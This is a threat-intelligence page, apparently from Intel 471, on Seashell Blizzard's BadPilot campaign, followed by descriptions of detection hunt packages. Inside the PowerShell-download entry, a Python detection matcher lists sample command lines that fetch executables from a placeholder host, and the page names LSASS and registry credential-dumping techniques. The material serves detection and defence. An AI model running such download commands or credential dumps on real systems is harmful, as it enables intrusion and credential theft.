BadPilot Campaign | Intel 471

BadPilot Campaign

Feb 26, 2025

Threat Overview - BadPilot Campaign

Researchers at Microsoft published an analysis of a subgroup within the infamous Russian state-sponsored actor Seashell Blizzard that has conducted a campaign code-named BadPilot since 2021. During this campaign, the subgroup compromised internet-facing infrastructure to gain and maintain persistent access to geographically diverse high-value targets, including energy, telecommunications, shipping, arms manufacturing and international government entities. The threat actor initially concentrated its efforts on Ukraine and eventually expanded globally, targeting entities in the United States, United Kingdom, Canada and Australia. Seashell Blizzard's expansion beyond its usual Eastern European activity deserves the community's attention, as the group is considered highly sophisticated, with a diverse spectrum of capabilities ranging from cyber espionage to the destruction of targeted systems. The subgroup conducting BadPilot has been observed exploiting known vulnerabilities, such as CVE-2024-1709 (ConnectWise ScreenConnect) and CVE-2023-48788 (Fortinet FortiClient EMS), and abusing remote access tools such as Atera Agent and Splashtop Remote Services to maintain access. Given the global reach of the BadPilot campaign, organizations should prepare themselves and stay on top of activity related to this subgroup going forward.

TITAN References: TITAN Profile Report: Seashell Blizzard

Related Hunt Package Collection: Seashell Blizzard Threat Group

Get your FREE Community Account today on the HUNTER471 Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!

Related Hunt Packages

Suspicious BITS Activity - ScriptBlock

This package identifies activity in PowerShell logging associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.

Suspicious BITS Activity

This package identifies activity associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.

Single Character Batch Script File Executed on Endpoint

The provided logic looks for single-character batch script (.bat) file names in the command line arguments of a process execution. This is often malicious activity, as single-character script file names are uncommon in an environment when executed for legitimate purposes.

Potential Exfiltration - Common Rclone Arguments

This package identifies processes executed with common arguments associated with rclone activity used to exfiltrate data.

CertUtil file download

Identify suspicious downloads made with the built-in Windows tool CertUtil. CertUtil is not typically used to download executables, or files in general, from the web, so its use to download files from the Internet should be considered suspicious.

Suspicious Change in File or Folder Ownership - Potential Sensitive File Access or Ransomware

This Threat Hunt package identifies the use of 'takeown.exe' to modify file ownership, enabling further interaction with those files. This technique can be used by malware and ransomware to access sensitive files, either to steal them or to unlock them so they can be encrypted.

Methods for Downloading Files with PowerShell

This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
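The detection logic this package describes, as an added illustration that is not Intel 471's hunt package code: a Python matcher that runs the method list above over process command lines. The sample command lines and the example.invalid host are constructed.

```python
import re

# Download methods named in the hunt package, as (label, regex) pairs.
# Word boundaries keep short aliases such as "iwr" from matching inside other tokens.
DOWNLOAD_PATTERNS = [
    ("Invoke-WebRequest", re.compile(r"\b(invoke-webrequest|iwr)\b", re.I)),
    ("Invoke-RestMethod", re.compile(r"\b(invoke-restmethod|irm)\b", re.I)),
    ("Start-BitsTransfer", re.compile(r"\b(start-bitstransfer|sbt)\b", re.I)),
    ("System.Net.WebClient", re.compile(r"\bnet\.webclient\b", re.I)),
    ("HttpClient", re.compile(r"\bnet\.http\.httpclient\b", re.I)),
    # curl/wget alias Invoke-WebRequest in Windows PowerShell 5.1 only; curl.exe/wget.exe are native binaries.
    ("curl/wget alias", re.compile(r"\b(curl|wget)\b(?!\.exe)", re.I)),
]
# A PowerShell host must appear in the command line; this also covers wrappers like "cmd.exe /c powershell".
POWERSHELL_HOST = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)


def classify(cmdline):
    """Return the download method label for a PowerShell command line, else None."""
    if not POWERSHELL_HOST.search(cmdline):
        return None
    for label, pattern in DOWNLOAD_PATTERNS:
        if pattern.search(cmdline):
            return label
    return None


def hunt(cmdlines):
    """Run the matcher over process command lines; return (method, url, cmdline) hits."""
    hits = []
    for line in cmdlines:
        method = classify(line)
        if method:
            m = URL.search(line)
            hits.append((method, m.group(0) if m else None, line))
    return hits


# Constructed sample command lines (example.invalid is a placeholder host).
# An -EncodedCommand payload hides these strings from a command-line match;
# pair this logic with ScriptBlock logging to inspect the decoded script.
SAMPLE_CMDLINES = [
    r'powershell.exe -nop -w hidden -c "iwr http://example.invalid/agent.msi -OutFile C:\Users\Public\a.msi"',
    "cmd.exe /c powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe','x.exe')",
    "curl.exe -o out.bin http://example.invalid/out.bin",
    r"powershell.exe -File C:\scripts\inventory.ps1",
    'pwsh -c "Start-BitsTransfer -Source http://example.invalid/t.zip -Destination C:\\t.zip"',
    "powershell wget http://example.invalid/p.ps1 -OutFile p.ps1",
]
```

Calling hunt(SAMPLE_CMDLINES) flags four of the six lines; the native curl.exe call and the local script execution are left alone.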

Remote Atera Agent Download - Command Line

This Threat Hunt package identifies when a tool such as a LOLBin is used to fetch Atera's Remote Monitoring and Management (RMM) agent directly from Atera's distribution domain.

Remote Atera Agent Download - Web

This Threat Hunt package identifies when Atera's Remote Monitoring and Management (RMM) agent is downloaded directly from Atera's distribution domain.

Attempted Credential Dump From Registry Via Reg.exe

This use case looks for execution of reg.exe with parameters that export registry keys containing hashed credentials, which attackers may then try to crack offline.

Dump LSASS via Renamed procdump

Identify ProcDump usage as a means of dumping LSASS memory. ProcDump is a Sysinternals tool for dumping process memory; a dump of lsass.exe can be used to obtain credentials.